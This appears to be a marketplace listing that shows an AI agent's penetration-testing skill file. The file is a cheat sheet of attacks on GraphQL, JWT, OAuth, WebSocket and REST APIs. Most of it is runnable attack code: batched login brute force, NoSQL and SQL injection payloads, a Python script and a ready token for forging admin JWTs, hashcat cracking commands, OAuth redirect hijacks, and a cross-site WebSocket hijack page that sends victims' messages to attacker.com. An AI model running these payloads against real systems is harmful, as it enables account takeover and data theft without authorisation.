Skip to main content

pentest-protocols

Pentest: GraphQL, JWT, OAuth, WebSocket, REST API — protocol-specific attack vectors.

설치로 이동

소스 정보

저장소
aurict/aurict
최근 소스 활동
2026년 6월 24일 19:34
감지된 SKILL.md 언어
영어
스타
33
포크
2

설치 방법

기본적으로 소스를 먼저 확인하는 Prompt가 선택됩니다. 직접 명령으로 전환하거나 로컬 사본을 다운로드할 수도 있습니다.

소스 파일 검토

설치 여부를 결정하기 전에 SKILL.md와 SkillsMP에 표시된 보조 파일을 읽어 보세요.

SKILL.md 표시 중

SKILL.md
소스 지침 · 읽기 전용 미리보기
name
pentest-protocols
description
Pentest: GraphQL, JWT, OAuth, WebSocket, REST API — protocol-specific attack vectors.
triggers
{"keywords":["graphql","jwt","oauth","websocket","api security","token","bearer","introspection","authorization code","refresh token"]}
auto_load_when
Testing API protocols, authentication flows, or real-time communication security
agent
pentest
tools
["Read","Bash","WebFetch"]
# Protocol Security — Attack Vectors --- ## GraphQL ### Introspection (information disclosure) ```bash # Check if introspection is enabled curl -s -X POST TARGET/graphql \ -H "Content-Type: application/json" \ -d '{"query":"{ __schema { types { name } } }"}' # Full schema dump curl -s -X POST TARGET/graphql \ -H "Content-Type: application/json" \ -d '{"query":"{ __schema { queryType { fields { name description args { name type { name } } } } } }"}' ``` ### Batch query abuse (rate limit bypass) ```json [ {"query": "mutation { login(user:\"admin\", pass:\"pass1\") { token } }"}, {"query": "mutation { login(user:\"admin\", pass:\"pass2\") { token } }"}, {"query": "mutation { login(user:\"admin\", pass:\"pass3\") { token } }"} ] ``` ### IDOR via GraphQL ```graphql # Try accessing other users' data by changing IDs query { user(id: "1") { email, password_hash, admin } } query { user(id: "2") { email, password_hash, admin } } ``` ### NoSQL injection via GraphQL variables ```json {"query": "query($user: String!) { login(username: $user) }", "variables": {"user": {"$gt": ""}}} ``` --- ## JWT ### Algorithm confusion (RS256 → HS256) ```python # 1. Get the server's public key from /jwks.json or /.well-known/openid-configuration # 2. Modify JWT header: {"alg": "HS256"} # 3. Sign with the PUBLIC KEY as HMAC secret import hmac, hashlib, base64, json header = base64.urlsafe_b64encode(json.dumps({"alg":"HS256","typ":"JWT"}).encode()).rstrip(b'=') payload = base64.urlsafe_b64encode(json.dumps({"sub":"admin","role":"admin"}).encode()).rstrip(b'=') sig_input = header + b'.' + payload signature = base64.urlsafe_b64encode(hmac.new(PUBLIC_KEY_BYTES, sig_input, hashlib.sha256).digest()).rstrip(b'=') forged_token = (header + b'.' + payload + b'.' + signature).decode() ``` ### None algorithm ``` # Header: {"alg":"none","typ":"JWT"} # Payload: {"sub":"admin","role":"admin"} # No signature — just append trailing dot eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9. ``` ### Key confusion (kid header injection) ```json // If kid header is used in a SQL query: {"kid": "' UNION SELECT 'secret'-- "} // If kid is a file path: {"kid": "/dev/null"} // results in empty key → sign with empty string ``` ### JWT cracking (weak secret) ```bash hashcat -a 0 -m 16500 JWT_TOKEN /usr/share/wordlists/rockyou.txt # or python3 jwt_tool.py JWT_TOKEN -C -d wordlist.txt ``` --- ## OAuth 2.0 ### Authorization code interception ``` # 1. Craft a malicious redirect_uri not on the allowlist /oauth/authorize?client_id=app&redirect_uri=https://attacker.com&response_type=code # 2. Open redirect chaining: find open redirect in allowed domain /oauth/authorize?...&redirect_uri=https://ALLOWED.com/redirect?next=https://attacker.com ``` ### State parameter CSRF ``` # If state is absent or predictable → CSRF on OAuth flow # Attacker initiates OAuth, intercepts the redirect, uses victim's code ``` ### Token leakage via Referer ``` # If access_token is in fragment (#) and page loads external resources # Token may appear in Referer header to third-party servers ``` ### Insufficient scope validation ``` # Request a token with minimal scope # Try to use it for higher-privileged operations GET /api/admin/users (with a read:profile token) ``` --- ## WebSocket ### Message tampering ```javascript // Connect and intercept: use Burp Suite WebSocket history // Or via browser console: const ws = new WebSocket('wss://TARGET/ws'); ws.onmessage = (e) => console.log(e.data); ws.send(JSON.stringify({"action": "getUser", "userId": 1})); ws.send(JSON.stringify({"action": "getUser", "userId": 2})); // IDOR ``` ### Cross-Site WebSocket Hijacking (CSWSH) ```html <!-- Host on attacker server — victim visits, their WS session is hijacked --> <script> var ws = new WebSocket('wss://TARGET/ws'); ws.onmessage = function(e) { fetch('https://attacker.com/collect?data=' + encodeURIComponent(e.data)); }; </script> ``` **Requires:** WebSocket connection authenticated only via cookies (no CSRF token). ### Authentication bypass ``` # Test if WS endpoint requires the same auth as REST # Connect to WS with no/expired token — see if messages are processed ``` --- ## REST API ### Mass assignment ```bash # Add unexpected fields to a POST/PUT request curl -X PUT TARGET/api/users/me \ -d '{"name":"user","role":"admin","isVerified":true,"credits":99999}' ``` ### HTTP verb tampering ```bash # Server may handle PATCH differently than PUT curl -X PATCH TARGET/api/resource/1 -d '{"owner_id": 2}' curl -X DELETE TARGET/api/resource/1 # unauthorized delete attempt ``` ### Parameter pollution ``` GET /api/transfer?amount=100&recipient=victim&recipient=attacker # Which recipient wins depends on the framework ``` ### API versioning abuse ``` # New version may have security fixes — old version may not GET /api/v1/users/admin (old version, possibly less restricted) GET /api/v2/users/admin (new version, better controls) ``` ### Rate limit bypass techniques ``` # IP rotation via X-Forwarded-For header spoofing X-Forwarded-For: 1.2.3.4 # User-Agent rotation # Distributed requests from different IPs ```
GitHub에서 보기